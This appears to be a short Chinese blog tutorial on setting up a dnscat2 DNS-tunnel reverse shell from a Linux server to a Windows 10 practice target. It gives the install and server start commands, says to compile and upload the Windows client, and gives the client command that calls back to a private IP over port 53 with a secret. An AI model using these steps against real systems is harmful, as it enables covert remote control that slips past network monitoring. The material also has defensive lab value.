使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
AOwhisky13 小时前
Linux(CentOS)系统管理入门笔记:第二期核心知识点自测与详解
linux·笔记·centos
weixin_4334176713 小时前
TortoiseGit推送到远端,如何配置
windows·git
Zhu75813 小时前
在Docker环境部署ApacheGuacamole,对接MySQL数据库
运维·docker·容器
Bruce_Liuxiaowei14 小时前
一次内网横向移动实战:从一个 5900 端口到穿越防火墙
运维·网络·安全
云计算-Security14 小时前
同(异)主机 Linux NAT 最佳实践
linux·服务器·网络
章老师说15 小时前
BFE v1.8.3 正式发布:AI网关能力再升级,企业级七层负载均衡持续进化
运维·人工智能·负载均衡
天空'之城1 天前
Linux 系统编程 22:五种 IO 模型全解
linux
2601_962364971 天前
Windows Hello VS 传统密码:身份认证安全层级全面对比分析
windows·安全·电脑
小张成长计划..1 天前
【Linux】10:冯·诺依曼体系结构和操作系统
linux·运维·服务器
悦儿遥遥雨11 天前
PXE + Kickstart 无人值守批量部署系统
linux·javascript·nginx